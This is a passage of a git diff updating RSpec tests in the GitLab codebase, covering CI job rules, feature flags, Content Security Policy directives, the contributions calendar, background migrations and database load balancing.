ref: 'master', scheduling_type: :stage, when: 'on_success' } } let(:previous_stages) { [] } let(:current_stage) { double(seeds_names: [attributes[:name]]) } @@ -61,17 +61,35 @@ RSpec.describe Gitlab::Ci::Pipeline::Seed::Build do end end - context 'with job:rules but no explicit when:' do - context 'is matched' do - let(:attributes) { { name: 'rspec', ref: 'master', rules: [{ if: '$VAR == null' }] } } + context 'with job: rules but no explicit when:' do + let(:base_attributes) { { name: 'rspec', ref: 'master' } } + + context 'with a manual job' do + context 'with a matched rule' do + let(:attributes) { base_attributes.merge(when: 'manual', rules: [{ if: '$VAR == null' }]) } + + it { is_expected.to include(when: 'manual') } + end - it { is_expected.to include(when: 'on_success') } + context 'is not matched' do + let(:attributes) { base_attributes.merge(when: 'manual', rules: [{ if: '$VAR != null' }]) } + + it { is_expected.to include(when: 'never') } + end end - context 'is not matched' do - let(:attributes) { { name: 'rspec', ref: 'master', rules: [{ if: '$VAR != null' }] } } + context 'with an automatic job' do + context 'is matched' do + let(:attributes) { base_attributes.merge(when: 'on_success', rules: [{ if: '$VAR == null' }]) } - it { is_expected.to include(when: 'never') } + it { is_expected.to include(when: 'on_success') } + end + + context 'is not matched' do + let(:attributes) { base_attributes.merge(when: 'on_success', rules: [{ if: '$VAR != null' }]) } + + it { is_expected.to include(when: 'never') } + end end end @@ -393,6 +411,10 @@ RSpec.describe Gitlab::Ci::Pipeline::Seed::Build do describe '#to_resource' do subject { seed_build.to_resource } + before do + stub_feature_flags(create_deployment_in_separate_transaction: false) + end + context 'when job is Ci::Build' do it { is_expected.to be_a(::Ci::Build) } it { is_expected.to be_valid } @@ -443,6 +465,18 @@ RSpec.describe Gitlab::Ci::Pipeline::Seed::Build do it_behaves_like 'deployment job' it_behaves_like 'ensures environment existence' + context 'when create_deployment_in_separate_transaction feature flag is enabled' do + before do + stub_feature_flags(create_deployment_in_separate_transaction: true) + end + + it 'does not create any deployments nor environments' do + expect(subject.deployment).to be_nil + expect(Environment.count).to eq(0) + expect(Deployment.count).to eq(0) + end + end + context 'when the environment name is invalid' do let(:attributes) { { name: 'deploy', ref: 'master', environment: '!!!' } } @@ -452,25 +486,6 @@ RSpec.describe Gitlab::Ci::Pipeline::Seed::Build do expect(subject.metadata.expanded_environment_name).to be_nil expect(Environment.exists?(name: expected_environment_name)).to eq(false) end - - context 'when surface_environment_creation_failure feature flag is disabled' do - before do - stub_feature_flags(surface_environment_creation_failure: false) - end - - it_behaves_like 'non-deployment job' - it_behaves_like 'ensures environment inexistence' - - it 'tracks an exception' do - expect(Gitlab::ErrorTracking).to receive(:track_exception) - .with(an_instance_of(described_class::EnvironmentCreationFailure), - project_id: project.id, - reason: %q{Name can contain only letters, digits, '-', '_', '/', '$', '{', '}', '.', and spaces, but it cannot start or end with '/'}) - .once - - subject - end - end end end @@ -515,6 +530,18 @@ RSpec.describe Gitlab::Ci::Pipeline::Seed::Build do it 'returns a job with resource group' do expect(subject.resource_group).not_to be_nil expect(subject.resource_group.key).to eq('iOS') + expect(Ci::ResourceGroup.count).to eq(1) + end + + context 'when create_deployment_in_separate_transaction feature flag is enabled' do + before do + stub_feature_flags(create_deployment_in_separate_transaction: true) + end + + it 'does not create any resource groups' do + expect(subject.resource_group).to be_nil + expect(Ci::ResourceGroup.count).to eq(0) + end end context 'when resource group has $CI_ENVIRONMENT_NAME in it' do @@ -892,7 +919,7 @@ RSpec.describe Gitlab::Ci::Pipeline::Seed::Build do context 'using rules:' do using RSpec::Parameterized - let(:attributes) { { name: 'rspec', rules: rule_set } } + let(:attributes) { { name: 'rspec', rules: rule_set, when: 'on_success' } } context 'with a matching if: rule' do context 'with an explicit `when: never`' do diff --git a/spec/lib/gitlab/ci/status/bridge/common_spec.rb b/spec/lib/gitlab/ci/status/bridge/common_spec.rb index 37524afc83d..30e6ad234a0 100644 --- a/spec/lib/gitlab/ci/status/bridge/common_spec.rb +++ b/spec/lib/gitlab/ci/status/bridge/common_spec.rb @@ -29,7 +29,15 @@ RSpec.describe Gitlab::Ci::Status::Bridge::Common do end it { expect(subject).to have_details } - it { expect(subject.details_path).to include "pipelines/#{downstream_pipeline.id}" } + it { expect(subject.details_path).to include "jobs/#{bridge.id}" } + + context 'with ci_retry_downstream_pipeline ff disabled' do + before do + stub_feature_flags(ci_retry_downstream_pipeline: false) + end + + it { expect(subject.details_path).to include "pipelines/#{downstream_pipeline.id}" } + end end context 'when user does not have access to read downstream pipeline' do diff --git a/spec/lib/gitlab/ci/tags/bulk_insert_spec.rb b/spec/lib/gitlab/ci/tags/bulk_insert_spec.rb new file mode 100644 index 00000000000..6c1f56de840 --- /dev/null +++ b/spec/lib/gitlab/ci/tags/bulk_insert_spec.rb @@ -0,0 +1,39 @@ +# frozen_string_literal: true + +require 'spec_helper' + +RSpec.describe Gitlab::Ci::Tags::BulkInsert do + let_it_be(:project) { create(:project, :repository) } + let_it_be(:pipeline) { create(:ci_pipeline, project: project) } + let_it_be_with_refind(:job) { create(:ci_build, :unique_name, pipeline: pipeline, project: project) } + let_it_be_with_refind(:other_job) { create(:ci_build, :unique_name, pipeline: pipeline, project: project) } + let_it_be_with_refind(:bridge) { create(:ci_bridge, pipeline: pipeline, project: project) } + + let(:statuses) { [job, bridge, other_job] } + + subject(:service) { described_class.new(statuses, tags_list) } + + describe '#insert!' do + context 'without tags' do + let(:tags_list) { {} } + + it { expect(service.insert!).to be_falsey } + end + + context 'with tags' do + let(:tags_list) do + { + job.name => %w[tag1 tag2], + other_job.name => %w[tag2 tag3 tag4] + } + end + + it 'persists tags' do + expect(service.insert!).to be_truthy + + expect(job.reload.tag_list).to match_array(%w[tag1 tag2]) + expect(other_job.reload.tag_list).to match_array(%w[tag2 tag3 tag4]) + end + end + end +end diff --git a/spec/lib/gitlab/ci/variables/builder_spec.rb b/spec/lib/gitlab/ci/variables/builder_spec.rb index 10275f33484..5ff34592b2f 100644 --- a/spec/lib/gitlab/ci/variables/builder_spec.rb +++ b/spec/lib/gitlab/ci/variables/builder_spec.rb @@ -24,15 +24,5 @@ RSpec.describe Gitlab::Ci::Variables::Builder do expect(names).to include(*keys) end end - - context 'feature flag disabled' do - before do - stub_feature_flags(ci_predefined_vars_in_builder: false) - end - - it 'returns no variables' do - expect(subject.map { |env| env[:key] }).to be_empty - end - end end end diff --git a/spec/lib/gitlab/ci/yaml_processor_spec.rb b/spec/lib/gitlab/ci/yaml_processor_spec.rb index f00a801286d..e8b38b21ef8 100644 --- a/spec/lib/gitlab/ci/yaml_processor_spec.rb +++ b/spec/lib/gitlab/ci/yaml_processor_spec.rb @@ -2139,7 +2139,7 @@ module Gitlab end end - context 'with when/rules conflict' do + context 'with when/rules' do subject { Gitlab::Ci::YamlProcessor.new(YAML.dump(config)).execute } let(:config) do @@ -2174,7 +2174,7 @@ module Gitlab } end - it_behaves_like 'returns errors', /may not be used with `rules`: when/ + it { is_expected.to be_valid } end context 'used with job-level when:delayed' do @@ -2190,7 +2190,7 @@ module Gitlab } end - it_behaves_like 'returns errors', /may not be used with `rules`: when, start_in/ + it_behaves_like 'returns errors', /may not be used with `rules`: start_in/ end end diff --git a/spec/lib/gitlab/cleanup/orphan_lfs_file_references_spec.rb b/spec/lib/gitlab/cleanup/orphan_lfs_file_references_spec.rb index b0f7703462a..f5f02046d4e 100644 --- a/spec/lib/gitlab/cleanup/orphan_lfs_file_references_spec.rb +++ b/spec/lib/gitlab/cleanup/orphan_lfs_file_references_spec.rb @@ -97,6 +97,6 @@ RSpec.describe Gitlab::Cleanup::OrphanLfsFileReferences do def stub_lfs_pointers(repo, *oids) expect(repo.gitaly_blob_client) .to receive(:get_all_lfs_pointers) - .and_return(oids.map { |oid| OpenStruct.new(lfs_oid: oid) }) + .and_return(oids.map { |oid| double('pointers', lfs_oid: oid) }) end end diff --git a/spec/lib/gitlab/config/entry/undefined_spec.rb b/spec/lib/gitlab/config/entry/undefined_spec.rb index 36faabd8e31..31e0f9487aa 100644 --- a/spec/lib/gitlab/config/entry/undefined_spec.rb +++ b/spec/lib/gitlab/config/entry/undefined_spec.rb @@ -40,4 +40,10 @@ RSpec.describe Gitlab::Config::Entry::Undefined do expect(entry.specified?).to eq false end end + + describe '#type' do + it 'returns nil' do + expect(entry.type).to eq nil + end + end end diff --git a/spec/lib/gitlab/content_security_policy/config_loader_spec.rb b/spec/lib/gitlab/content_security_policy/config_loader_spec.rb index c0476d38380..56e3fc269e6 100644 --- a/spec/lib/gitlab/content_security_policy/config_loader_spec.rb +++ b/spec/lib/gitlab/content_security_policy/config_loader_spec.rb @@ -85,7 +85,7 @@ RSpec.describe Gitlab::ContentSecurityPolicy::ConfigLoader do expect(directives['style_src']).to eq("'self' 'unsafe-inline' https://cdn.example.com") expect(directives['font_src']).to eq("'self' https://cdn.example.com") expect(directives['worker_src']).to eq('http://localhost/assets/ blob: data: https://cdn.example.com') - expect(directives['frame_src']).to eq(::Gitlab::ContentSecurityPolicy::Directives.frame_src + " https://cdn.example.com http://localhost/admin/sidekiq http://localhost/admin/sidekiq/ http://localhost/-/speedscope/index.html") + expect(directives['frame_src']).to eq(::Gitlab::ContentSecurityPolicy::Directives.frame_src + " https://cdn.example.com http://localhost/admin/ http://localhost/assets/ http://localhost/-/speedscope/index.html") end end @@ -113,7 +113,7 @@ RSpec.describe Gitlab::ContentSecurityPolicy::ConfigLoader do end it 'does not add CUSTOMER_PORTAL_URL to CSP' do - expect(directives['frame_src']).to eq(::Gitlab::ContentSecurityPolicy::Directives.frame_src + " http://localhost/admin/sidekiq http://localhost/admin/sidekiq/ http://localhost/-/speedscope/index.html") + expect(directives['frame_src']).to eq(::Gitlab::ContentSecurityPolicy::Directives.frame_src + " http://localhost/admin/ http://localhost/assets/ http://localhost/-/speedscope/index.html") end end @@ -123,12 +123,12 @@ RSpec.describe Gitlab::ContentSecurityPolicy::ConfigLoader do end it 'adds CUSTOMER_PORTAL_URL to CSP' do - expect(directives['frame_src']).to eq(::Gitlab::ContentSecurityPolicy::Directives.frame_src + " http://localhost/rails/letter_opener/ https://customers.example.com http://localhost/admin/sidekiq http://localhost/admin/sidekiq/ http://localhost/-/speedscope/index.html") + expect(directives['frame_src']).to eq(::Gitlab::ContentSecurityPolicy::Directives.frame_src + " http://localhost/rails/letter_opener/ https://customers.example.com http://localhost/admin/ http://localhost/assets/ http://localhost/-/speedscope/index.html") end end end - context 'letter_opener applicaiton URL' do + context 'letter_opener application URL' do let(:gitlab_url) { 'http://gitlab.example.com' } let(:letter_opener_url) { "#{gitlab_url}/rails/letter_opener/" } @@ -156,6 +156,46 @@ RSpec.describe Gitlab::ContentSecurityPolicy::ConfigLoader do end end end + + context 'Snowplow Micro event collector' do + let(:snowplow_micro_hostname) { 'localhost:9090' } + let(:snowplow_micro_url) { "http://#{snowplow_micro_hostname}/" } + + before do + stub_env('SNOWPLOW_MICRO_ENABLE', 1) + allow(Gitlab::Tracking).to receive(:collector_hostname).and_return(snowplow_micro_hostname) + end + + context 'when in production' do + before do + stub_rails_env('production') + end + + it 'does not add Snowplow Micro URL to connect-src' do + expect(directives['connect_src']).not_to include(snowplow_micro_url) + end + end + + context 'when in development' do + before do + stub_rails_env('development') + end + + it 'adds Snowplow Micro URL with trailing slash to connect-src' do + expect(directives['connect_src']).to match(Regexp.new(snowplow_micro_url)) + end + + context 'when not enabled using ENV[SNOWPLOW_MICRO_ENABLE]' do + before do + stub_env('SNOWPLOW_MICRO_ENABLE', nil) + end + + it 'does not add Snowplow Micro URL to connect-src' do + expect(directives['connect_src']).not_to include(snowplow_micro_url) + end + end + end + end end describe '#load' do diff --git a/spec/lib/gitlab/contributions_calendar_spec.rb b/spec/lib/gitlab/contributions_calendar_spec.rb index 384609c6664..8a9ab736d46 100644 --- a/spec/lib/gitlab/contributions_calendar_spec.rb +++ b/spec/lib/gitlab/contributions_calendar_spec.rb @@ -50,7 +50,8 @@ RSpec.describe Gitlab::ContributionsCalendar do Event.create!( project: project, action: action, - target: @targets[project], + target_type: @targets[project].class.name, + target_id: @targets[project].id, author: contributor, created_at: DateTime.new(day.year, day.month, day.day, hour) ) @@ -66,14 +67,34 @@ RSpec.describe Gitlab::ContributionsCalendar do end context "when the user has opted-in for private contributions" do + before do + contributor.update_column(:include_private_contributions, true) + end + it "shows private and public events to all users" do - user.update_column(:include_private_contributions, true) create_event(private_project, today) create_event(public_project, today) + expect(calendar.activity_dates[today]).to eq(2) + expect(calendar(user).activity_dates[today]).to eq(2) + expect(calendar(contributor).activity_dates[today]).to eq(2) + end + + # tests for bug https://gitlab.com/gitlab-org/gitlab/-/merge_requests/74826 + it "still counts correct with feature access levels set to private" do + create_event(private_project, today) + + private_project.project_feature.update_attribute(:issues_access_level, ProjectFeature::PRIVATE) + private_project.project_feature.update_attribute(:repository_access_level, ProjectFeature::PRIVATE) + private_project.project_feature.update_attribute(:merge_requests_access_level, ProjectFeature::PRIVATE) + expect(calendar.activity_dates[today]).to eq(1) expect(calendar(user).activity_dates[today]).to eq(1) - expect(calendar(contributor).activity_dates[today]).to eq(2) + expect(calendar(contributor).activity_dates[today]).to eq(1) + end + + it "does not fail if there are no contributed projects" do + expect(calendar.activity_dates[today]).to eq(nil) end end @@ -125,6 +146,7 @@ RSpec.describe Gitlab::ContributionsCalendar do create_event(public_project, today, 10) create_event(public_project, today, 16) create_event(public_project, today, 23) + create_event(public_project, tomorrow, 1) end it "renders correct event counts within the UTC timezone" do @@ -137,14 +159,14 @@ RSpec.describe Gitlab::ContributionsCalendar do it "renders correct event counts within the Sydney timezone" do Time.use_zone('UTC') do contributor.timezone = 'Sydney' - expect(calendar.activity_dates).to eq(today => 3, tomorrow => 2) + expect(calendar.activity_dates).to eq(today => 3, tomorrow => 3) end end it "renders correct event counts within the US Central timezone" do Time.use_zone('UTC') do contributor.timezone = 'Central Time (US & Canada)' - expect(calendar.activity_dates).to eq(yesterday => 2, today => 3) + expect(calendar.activity_dates).to eq(yesterday => 2, today => 4) end end end @@ -169,6 +191,12 @@ RSpec.describe Gitlab::ContributionsCalendar do expect(calendar(contributor).events_by_date(today)).to contain_exactly(e1, e2, e3) end + it "includes diff notes on merge request" do + e1 = create_event(public_project, today, 0, :commented, :diff_note_on_merge_request) + + expect(calendar.events_by_date(today)).to contain_exactly(e1) + end + context 'when the user cannot read cross project' do before do allow(Ability).to receive(:allowed?).and_call_original diff --git a/spec/lib/gitlab/daemon_spec.rb b/spec/lib/gitlab/daemon_spec.rb index 075a1e414c7..4d11b0bdc6c 100644 --- a/spec/lib/gitlab/daemon_spec.rb +++ b/spec/lib/gitlab/daemon_spec.rb @@ -46,6 +46,30 @@ RSpec.describe Gitlab::Daemon do expect(subject).to have_received(:run_thread) end + + context '@synchronous' do + context 'when @synchronous is set to true' do + subject { described_class.instance(synchronous: true) } + + it 'calls join on the thread' do + # Thread has to be run in a block, expect_next_instance_of does not support this. + expect_any_instance_of(Thread).to receive(:join) # rubocop:disable RSpec/AnyInstanceOf + + subject.start + end + end + + context 'when @synchronous is not set to a truthy value' do + subject { described_class.instance } + + it 'does not call join on the thread' do + # Thread has to be run in a block, expect_next_instance_of does not support this. + expect_any_instance_of(Thread).not_to receive(:join) # rubocop:disable RSpec/AnyInstanceOf + + subject.start + end + end + end end describe '#stop' do diff --git a/spec/lib/gitlab/database/async_indexes/index_creator_spec.rb b/spec/lib/gitlab/database/async_indexes/index_creator_spec.rb index b4010d0fe8d..7ad3eb395a9 100644 --- a/spec/lib/gitlab/database/async_indexes/index_creator_spec.rb +++ b/spec/lib/gitlab/database/async_indexes/index_creator_spec.rb @@ -3,6 +3,8 @@ require 'spec_helper' RSpec.describe Gitlab::Database::AsyncIndexes::IndexCreator do + include ExclusiveLeaseHelpers + describe '#perform' do subject { described_class.new(async_index) } @@ -10,7 +12,18 @@ RSpec.describe Gitlab::Database::AsyncIndexes::IndexCreator do let(:index_model) { Gitlab::Database::AsyncIndexes::PostgresAsyncIndex } - let(:connection) { ApplicationRecord.connection } + let(:model) { Gitlab::Database.database_base_models[Gitlab::Database::PRIMARY_DATABASE_NAME] } + let(:connection) { model.connection } + + let!(:lease) { stub_exclusive_lease(lease_key, :uuid, timeout: lease_timeout) } + let(:lease_key) { "gitlab/database/async_indexes/index_creator/#{Gitlab::Database::PRIMARY_DATABASE_NAME}" } + let(:lease_timeout) { described_class::TIMEOUT_PER_ACTION } + + around do |example| + Gitlab::Database::SharedModel.using_connection(connection) do + example.run + end + end context 'when the index already exists' do before do @@ -40,7 +53,7 @@ RSpec.describe Gitlab::Database::AsyncIndexes::IndexCreator do end it 'skips logic if not able to acquire exclusive lease' do - expect(subject).to receive(:try_obtain_lease).and_return(false) + expect(lease).to receive(:try_obtain).ordered.and_return(false) expect(connection).not_to receive(:execute).with(/CREATE INDEX/) expect(async_index).not_to receive(:destroy) diff --git a/spec/lib/gitlab/database/background_migration/batched_job_spec.rb b/spec/lib/gitlab/database/background_migration/batched_job_spec.rb index 0182e0f7651..c4364826ee2 100644 --- a/spec/lib/gitlab/database/background_migration/batched_job_spec.rb +++ b/spec/lib/gitlab/database/background_migration/batched_job_spec.rb @@ -17,15 +17,19 @@ RSpec.describe Gitlab::Database::BackgroundMigration::BatchedJob, type: :model d let_it_be(:stuck_job) { create(:batched_background_migration_job, status: :pending, updated_at: fixed_time - described_class::STUCK_JOBS_TIMEOUT) } let_it_be(:failed_job) { create(:batched_background_migration_job, status: :failed, attempts: 1) } - before_all do - create(:batched_background_migration_job, status: :failed, attempts: described_class::MAX_ATTEMPTS) - create(:batched_background_migration_job, status: :succeeded) - end + let!(:max_attempts_failed_job) { create(:batched_background_migration_job, status: :failed, attempts: described_class::MAX_ATTEMPTS) } + let!(:succeeded_job) { create(:batched_background_migration_job, status: :succeeded) } before do travel_to fixed_time end + describe '.except_succeeded' do + it 'returns not succeeded jobs' do + expect(described_class.except_succeeded).to contain_exactly(pending_job, running_job, stuck_job, failed_job, max_attempts_failed_job) + end + end + describe '.active' do it 'returns active jobs' do expect(described_class.active).to contain_exactly(pending_job, running_job, stuck_job) diff --git a/spec/lib/gitlab/database/background_migration/batched_migration_spec.rb b/spec/lib/gitlab/database/background_migration/batched_migration_spec.rb index a1c2634f59c..49714cfc4dd 100644 --- a/spec/lib/gitlab/database/background_migration/batched_migration_spec.rb +++ b/spec/lib/gitlab/database/background_migration/batched_migration_spec.rb @@ -23,6 +23,28 @@ RSpec.describe Gitlab::Database::BackgroundMigration::BatchedMigration, type: :m subject { build(:batched_background_migration) } it { is_expected.to validate_uniqueness_of(:job_arguments).scoped_to(:job_class_name, :table_name, :column_name) } + + context 'when there are failed jobs' do + let(:batched_migration) { create(:batched_background_migration, status: :active, total_tuple_count: 100) } + let!(:batched_job) { create(:batched_background_migration_job, batched_migration: batched_migration, status: :failed) } + + it 'raises an exception' do + expect { batched_migration.finished! }.to raise_error(ActiveRecord::RecordInvalid) + + expect(batched_migration.reload.status).to eql 'active' + end + end + + context 'when the jobs are completed' do + let(:batched_migration) { create(:batched_background_migration, status: :active, total_tuple_count: 100) } + let!(:batched_job) { create(:batched_background_migration_job, batched_migration: batched_migration, status: :succeeded) } + + it 'finishes the migration' do + batched_migration.finished! + + expect(batched_migration.status).to eql 'finished' + end + end end describe '.queue_order' do @@ -214,14 +236,20 @@ RSpec.describe Gitlab::Database::BackgroundMigration::BatchedMigration, type: :m end end - shared_examples_for 'an attr_writer that demodulizes assigned class names' do |attribute_name| + shared_examples_for 'an attr_writer that assigns class names' do |attribute_name| let(:batched_migration) { build(:batched_background_migration) } context 'when a module name exists' do - it 'removes the module name' do + it 'keeps the class with module name' do + batched_migration.public_send(:"#{attribute_name}=", 'Foo::Bar') + + expect(batched_migration[attribute_name]).to eq('Foo::Bar') + end + + it 'removes leading namespace resolution operator' do batched_migration.public_send(:"#{attribute_name}=", '::Foo::Bar') - expect(batched_migration[attribute_name]).to eq('Bar') + expect(batched_migration[attribute_name]).to eq('Foo::Bar') end end @@ -271,11 +299,11 @@ RSpec.describe Gitlab::Database::BackgroundMigration::BatchedMigration, type: :m end describe '#job_class_name=' do - it_behaves_like 'an attr_writer that demodulizes assigned class names', :job_class_name + it_behaves_like 'an attr_writer that assigns class names', :job_class_name end describe '#batch_class_name=' do - it_behaves_like 'an attr_writer that demodulizes assigned class names', :batch_class_name + it_behaves_like 'an attr_writer that assigns class names', :batch_class_name end describe '#migrated_tuple_count' do diff --git a/spec/lib/gitlab/database/count/reltuples_count_strategy_spec.rb b/spec/lib/gitlab/database/count/reltuples_count_strategy_spec.rb index 9d49db1f018..e7b9c5fcd02 100644 --- a/spec/lib/gitlab/database/count/reltuples_count_strategy_spec.rb +++ b/spec/lib/gitlab/database/count/reltuples_count_strategy_spec.rb @@ -5,24 +5,24 @@ require 'spec_helper' RSpec.describe Gitlab::Database::Count::ReltuplesCountStrategy do before do create_list(:project, 3) - create(:identity) + create_list(:ci_instance_variable, 2) end subject { described_class.new(models).count } describe '#count' do - let(:models) { [Project, Identity] } + let(:models) { [Project, Ci::InstanceVariable] } context 'when reltuples is up to date' do before do - ActiveRecord::Base.connection.execute('ANALYZE projects') - ActiveRecord::Base.connection.execute('ANALYZE identities') + Project.connection.execute('ANALYZE projects') + Ci::InstanceVariable.connection.execute('ANALYZE ci_instance_variables') end it 'uses statistics to do the count' do models.each { |model| expect(model).not_to receive(:count) } - expect(subject).to eq({ Project => 3, Identity => 1 }) + expect(subject).to eq({ Project => 3, Ci::InstanceVariable => 2 }) end end @@ -31,7 +31,7 @@ RSpec.describe Gitlab::Database::Count::ReltuplesCountStrategy do before do models.each do |model| - ActiveRecord::Base.connection.execute("ANALYZE #{model.table_name}") + model.connection.execute("ANALYZE #{model.table_name}") end end @@ -45,7 +45,9 @@ RSpec.describe Gitlab::Database::Count::ReltuplesCountStrategy do context 'insufficient permissions' do it 'returns an empty hash' do - allow(ActiveRecord::Base).to receive(:transaction).and_raise(PG::InsufficientPrivilege) + Gitlab::Database.database_base_models.each_value do |base_model| + allow(base_model).to receive(:transaction).and_raise(PG::InsufficientPrivilege) + end expect(subject).to eq({}) end diff --git a/spec/lib/gitlab/database/count/tablesample_count_strategy_spec.rb b/spec/lib/gitlab/database/count/tablesample_count_strategy_spec.rb index 2f261aebf02..37d3e13a7ab 100644 --- a/spec/lib/gitlab/database/count/tablesample_count_strategy_spec.rb +++ b/spec/lib/gitlab/database/count/tablesample_count_strategy_spec.rb @@ -5,11 +5,12 @@ require 'spec_helper' RSpec.describe Gitlab::Database::Count::TablesampleCountStrategy do before do create_list(:project, 3) + create_list(:ci_instance_variable, 2) create(:identity) create(:group) end - let(:models) { [Project, Identity, Group, Namespace] } + let(:models) { [Project, Ci::InstanceVariable, Identity, Group, Namespace] } let(:strategy) { described_class.new(models) } subject { strategy.count } @@ -20,7 +21,8 @@ RSpec.describe Gitlab::Database::Count::TablesampleCountStrategy do Project => threshold + 1, Identity => threshold - 1, Group => threshold + 1, - Namespace => threshold + 1 + Namespace => threshold + 1, + Ci::InstanceVariable => threshold + 1 } end @@ -43,12 +45,14 @@ RSpec.describe Gitlab::Database::Count::TablesampleCountStrategy do expect(Project).not_to receive(:count) expect(Group).not_to receive(:count) expect(Namespace).not_to receive(:count) + expect(Ci::InstanceVariable).not_to receive(:count) result = subject expect(result[Project]).to eq(3) expect(result[Group]).to eq(1) # 1-Group, 3 namespaces for each project and 3 project namespaces for each project expect(result[Namespace]).to eq(7) + expect(result[Ci::InstanceVariable]).to eq(2) end end diff --git a/spec/lib/gitlab/database/load_balancing/configuration_spec.rb b/spec/lib/gitlab/database/load_balancing/configuration_spec.rb index eef248afdf2..796c14c1038 100644 --- a/spec/lib/gitlab/database/load_balancing/configuration_spec.rb +++ b/spec/lib/gitlab/database/load_balancing/configuration_spec.rb @@ -140,6 +140,15 @@ RSpec.describe Gitlab::Database::LoadBalancing::Configuration do end describe '#service_discovery_enabled?' do + it 'returns false when running inside a Rake task' do + allow(Gitlab::Runtime).to receive(:rake?).and_return(true) + + config = described_class.new(ActiveRecord::Base) + config.service_discovery[:record] = 'foo' + + expect(config.service_discovery_enabled?).to eq(false) + end + it 'returns true when a record is configured' do config = described_class.new(ActiveRecord::Base) config.service_discovery[:record] = 'foo' diff --git a/spec/lib/gitlab/database/load_balancing/load_balancer_spec.rb b/spec/lib/gitlab/database/load_balancing/load_balancer_spec.rb index 37b83729125..3c7819c04b6 100644 --- a/spec/lib/gitlab/database/load_balancing/load_balancer_spec.rb +++ b/spec/lib/gitlab/database/load_balancing/load_balancer_spec.rb @@ -487,25 +487,9 @@ RSpec.describe Gitlab::Database::LoadBalancing::LoadBalancer, :request_store do end end - describe 'primary connection re-use', :reestablished_active_record_base do + describe 'primary connection re-use', :reestablished_active_record_base, :add_ci_connection do let(:model) { Ci::ApplicationRecord } - around do |example| - if Gitlab::Database.has_config?(:ci) - example.run - else - # fake additional Database - model.establish_connection( - ActiveRecord::DatabaseConfigurations::HashConfig.new(Rails.env, 'ci', ActiveRecord::Base.connection_db_config.configuration_hash) - ) - - example.run - - # Cleanup connection_specification_name for Ci::ApplicationRecord - model.remove_connection - end - end - describe '#read' do it 'returns ci replica connection' do expect { |b| lb.read(&b) }.to yield_with_args do |args| diff --git a/spec/lib/gitlab/database/load_balancing/service_discovery_spec.rb b/spec/lib/gitlab/database/load_balancing/service_discovery_spec.rb index e9bc465b1c7..f05910e5123 100644 --- a/spec/lib/gitlab/database/load_balancing/service_discovery_spec.rb +++ b/spec/lib/gitlab/database/load_balancing/service_discovery_spec.rb @@ -4,9 +4,10 @@ require 'spec_helper' RSpec.describe Gitlab::Database::LoadBalancing::ServiceDiscovery do let(:load_balancer) do - Gitlab::Database::LoadBalancing::LoadBalancer.new( - Gitlab::Database::LoadBalancing::Configuration.new(ActiveRecord::Base) - ) + configuration = Gitlab::Database::LoadBalancing::Configuration.new(ActiveRecord::Base) + configuration.service_discovery[:record] = 'localhost' + + Gitlab::Database::LoadBalancing::LoadBalancer.new(configuration) end let(:service) do @@ -86,6 +87,7 @@ RSpec.describe Gitlab::Database::LoadBalancing::ServiceDiscovery do service.perform_service_discovery end end + context 'with failures' do before do allow(Gitlab::ErrorTracking).to receive(:track_exception) diff --git a/spec/lib/gitlab/database/load_balancing/sidekiq_server_middleware_spec.rb b/spec/lib/gitlab/database/load_balancing/sidekiq_server_middleware_spec.rb index de2ad662d16..31be3963565 100644 --- a/spec/lib/gitlab/database/load_balancing/sidekiq_server_middleware_spec.rb +++ b/spec/lib/gitlab/database/load_balancing/sidekiq_server_middleware_spec.rb @@ -5,7 +5,9 @@ require 'spec_helper' RSpec.describe Gitlab::Database::LoadBalancing::SidekiqServerMiddleware, :clean_gitlab_redis_queues do let(:middleware) { described_class.new } let(:worker) { worker_class.new } - let(:job) { { "retry" => 3, "job_id" => "a180b47c-3fd6-41b8-81e9-34da61c3400e", 'database_replica_location' => '0/D525E3A8' } } + let(:location) {'0/D525E3A8' } + let(:wal_locations) { { Gitlab::Database::MAIN_DATABASE_NAME.to_sym => location } } + let(:job) { { "retry" => 3, "job_id" => "a180b47c-3fd6-41b8-81e9-34da61c3400e", 'wal_locations' => wal_locations } } before do skip_feature_flags_yaml_validation @@ -60,9 +62,6 @@ RSpec.describe Gitlab::Database::LoadBalancing::SidekiqServerMiddleware, :clean_ end shared_examples_for 'replica is up to date' do |expected_strategy| - let(:location) {'0/D525E3A8' } - let(:wal_locations) { { Gitlab::Database::MAIN_DATABASE_NAME.to_sym => location } } - it 'does not stick to the primary', :aggregate_failures do expect(ActiveRecord::Base.load_balancer) .to receive(:select_up_to_date_host) @@ -77,9 +76,7 @@ RSpec.describe Gitlab::Database::LoadBalancing::SidekiqServerMiddleware, :clean_ include_examples 'load balancing strategy', expected_strategy end - shared_examples_for 'sticks based on data consistency' do |data_consistency| - include_context 'data consistency worker class', data_consistency, :load_balancing_for_test_data_consistency_worker - + shared_examples_for 'sticks based on data consistency' do context 'when load_balancing_for_test_data_consistency_worker is disabled' do before do stub_feature_flags(load_balancing_for_test_data_consistency_worker: false) @@ -116,23 +113,78 @@ RSpec.describe Gitlab::Database::LoadBalancing::SidekiqServerMiddleware, :clean_ it_behaves_like 'replica is up to date', 'replica' end - context 'when legacy wal location is set' do - let(:job) { { 'job_id' => 'a180b47c-3fd6-41b8-81e9-34da61c3400e', 'database_write_location' => '0/D525E3A8' } } + context 'when database location is not set' do + let(:job) { { 'job_id' => 'a180b47c-3fd6-41b8-81e9-34da61c3400e' } } - before do - allow(ActiveRecord::Base.load_balancer) - .to receive(:select_up_to_date_host) - .with('0/D525E3A8') - .and_return(true) - end + include_examples 'stick to the primary', 'primary_no_wal' + end + end - it_behaves_like 'replica is up to date', 'replica' + shared_examples_for 'sleeps when necessary' do + context 'when WAL locations are blank', :freeze_time do + let(:job) { { "retry" => 3, "job_id" => "a180b47c-3fd6-41b8-81e9-34da61c3400e", "wal_locations" => {}, "created_at" => Time.current.to_f - (described_class::MINIMUM_DELAY_INTERVAL_SECONDS - 0.3) } } + + it 'does not sleep' do + expect(middleware).not_to receive(:sleep) + + run_middleware + end end - context 'when database location is not set' do - let(:job) { { 'job_id' => 'a180b47c-3fd6-41b8-81e9-34da61c3400e' } } + context 'when WAL locations are present', :freeze_time do + let(:job) { { "retry" => 3, "job_id" => "a180b47c-3fd6-41b8-81e9-34da61c3400e", 'wal_locations' => wal_locations, "created_at" => Time.current.to_f - elapsed_time } } - include_examples 'stick to the primary', 'primary_no_wal' + context 'when delay interval has not elapsed' do + let(:elapsed_time) { described_class::MINIMUM_DELAY_INTERVAL_SECONDS - 0.3 } + + context 'when replica is up to date' do + before do + Gitlab::Database::LoadBalancing.each_load_balancer do |lb| + allow(lb).to receive(:select_up_to_date_host).and_return(true) + end + end + + it 'does not sleep' do + 